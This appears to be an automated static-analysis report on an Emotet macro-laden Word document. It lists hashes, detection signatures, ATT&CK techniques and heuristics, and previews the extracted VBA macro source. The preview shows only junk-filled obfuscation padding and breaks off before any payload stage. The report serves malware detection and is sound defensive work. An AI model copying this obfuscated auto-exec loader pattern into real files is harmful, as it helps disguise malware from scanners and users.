Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 5ada1f249afb0dab…

MALICIOUS

Office (OLE)

Size: 307.5 KB
Created: 2019-10-11 17:58:00
Authoring application: Microsoft Office Word
First seen: 2020-01-07
MD5: b04482c6eb9a16dba1e8069925224fd5
SHA-1: d9ac1b040c0b91000e9293658f90349a36eda2df
SHA-256: 5ada1f249afb0dab78e36e9ef60a134dd593275d1f25d51ce200eb0073a168a9
Risk Score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7330698-0'. Static analysis reveals the presence of heavily obfuscated VBA macros, including an auto-executing 'autoopen' macro that utilizes GetObject and Shell execution. These characteristics are strongly indicative of the Emotet family, which commonly uses macro-enabled documents to download and execute further stages.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7330698-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7330698-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 245232 bytes
SHA-256: 8eabe5973b9a2f7d9ef54d144bb7ce906481af5fa3304b2d56e5e14c0aa4389c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "c9007605070"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x2501703442, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b80990202043, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b0410cc300910, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bx7483xbx41, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x56513bc3xb9x, 4, 4, MSForms, TextBox"
Attribute VB_Control = "x1b39xb450cc0, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b000038020068"
Function bb80463c445()
On Error Resume Next
   'Corporate17784 Hilpert Lock, South Onie, Guernsey Corporate793 Runolfsson Hills, Lorainetown, Finland
c993170005c4 = Rnd(c945104085b9 * ChrB(778)) + Log(198)
'Customer3768 Davis Fields, East Fordport, Saint Martin Human57074 Rogahn Forest, South Viola, United States Minor Outlying Islands
b500310460017 = Rnd(b4161bbb70xc0 * ChrB(904)) + Log(298)
'Chief4803 Dickens Manor, New Kevin, Romania Legacy8682 Wolff Cliffs, North Jevonborough, South Georgia and the South Sandwich Islands
x51b5382xx9 = Rnd(b5x3301b0cc * ChrB(397)) + Log(374)
'Legacy574 O'Hara Valleys, East Ima, Morocco Chief2106 Wiegand Burgs, Port Ambrose, Ghana
b1b3b03275x = Rnd(b0b166006b08 * ChrB(487)) + Log(443)
'Internal035 Wendell Creek, Port Teresa, Slovakia (Slovak Republic) Future264 Mauricio Points, Kemmerton, Republic of Korea
cc32x41x51800 = Rnd(c000964088803 * ChrB(170)) + Log(87)
'Lead656 Jalen Trail, Madelynville, French Southern Territories Product0203 Sporer Shoal, East Noreneberg, Saint Kitts and Nevis
x9206c2c0b4 = Rnd(c6780x7c00b4 * ChrB(176)) + Log(363)
'Dynamic03650 Ari Mission, Haleyberg, Mongolia Corporate05160 Enos Rue, North Dwightmouth, Tajikistan
c8350140080 = Rnd(c0x03xxbcxxc3 * ChrB(254)) + Log(570)
'International207 Gleason Mews, East Theoborough, Solomon Islands Legacy83905 Clarabelle Terrace, Beattychester, Antarctica (the territory South of 60 deg S)
'Future34236 Lucas Heights, East Lambertton, Mauritius Corporate50793 Harber Flats, Rileybury, Kuwait
b0c5xx7687520 = Rnd(c8420300045b * ChrB(609)) + Log(489)
'District87442 Corwin Causeway, Brandonport, Suriname Dynamic777 Guadalupe Neck, South Albertbury, Niger
x37053b6539b = Rnd(x00xb7b30x37 * ChrB(802)) + Log(502)
'Lead4109 Stehr Flats, Faemouth, Singapore Global3583 Kirsten Trace, Wardchester, Sao Tome and Principe
bb70b03202685 = Rnd(x69b4007400 * ChrB(843)) + Log(845)
'Regional4768 Haylie Centers, East Gertrude, Macedonia Legacy265 Zora Village, South Kaelynborough, Kiribati
b6707cc400x2x = Rnd(b55c8c95753b4 * ChrB(63)) + Log(681)
'Legacy753 Lindgren Ranch, Port Jayda, Georgia Legacy8804 Eldora Manor, Wardmouth, Maldives
cc539388x32 = Rnd(c90300x0600 * ChrB(344)) + Log(296)
'Legacy0039 Tillman Shoal, Lake Melany, Saint Helena Corporate4199 Joshuah Point, North Jordonfurt, Rwanda
xx41x9070008b = Rnd(c40445908xc45 * ChrB(48)) + Log(352)
'Forward588 Connelly Burgs, Lake Edwardochester, Belgium International4974 Bednar Point, North Kevintown, Mauritania
b87028102708 = Rnd(c804ccb04433b * ChrB(82)) + Log(272)
'District93957 Edward Overpass, Olenmouth, Belarus Forward624 Darwin Dale, West Rodgerville, Monaco
   'International2594 Fisher Lodge, Montyview, Myanmar Dynamic67348 Jakubowski Road, Lake Juwan, Saint Vincent and the Grenadines
b05b274b191 = Rnd(b722xx652x16 * ChrB(896)) + Log(19)
'National420 Rutherford Forge, Berneicehaven, Faroe Islands District0196 Quitzon Wells, South Verna, United Arab Emirates
x3cc80001937 = Rnd(b092b7330b1x5 * ChrB(159)) + Log(386)
'Legacy754 Nader Rest, Wolffurt, Guernsey International33092 Elena Terrace, Riverview, Niue
c1691c9b776 = Rnd(b60400x33050b * ChrB(323)) + Log(390)
'Regional72264 Rasheed Groves, South Shawnafort, Saint Kitts and Nevis Global5166 Alanna Villages, Ninaton, Kiribati
x073b7560007 = Rnd(x970801c0b890 * ChrB(706)) + Log(88)
'Corporate5
... (truncated)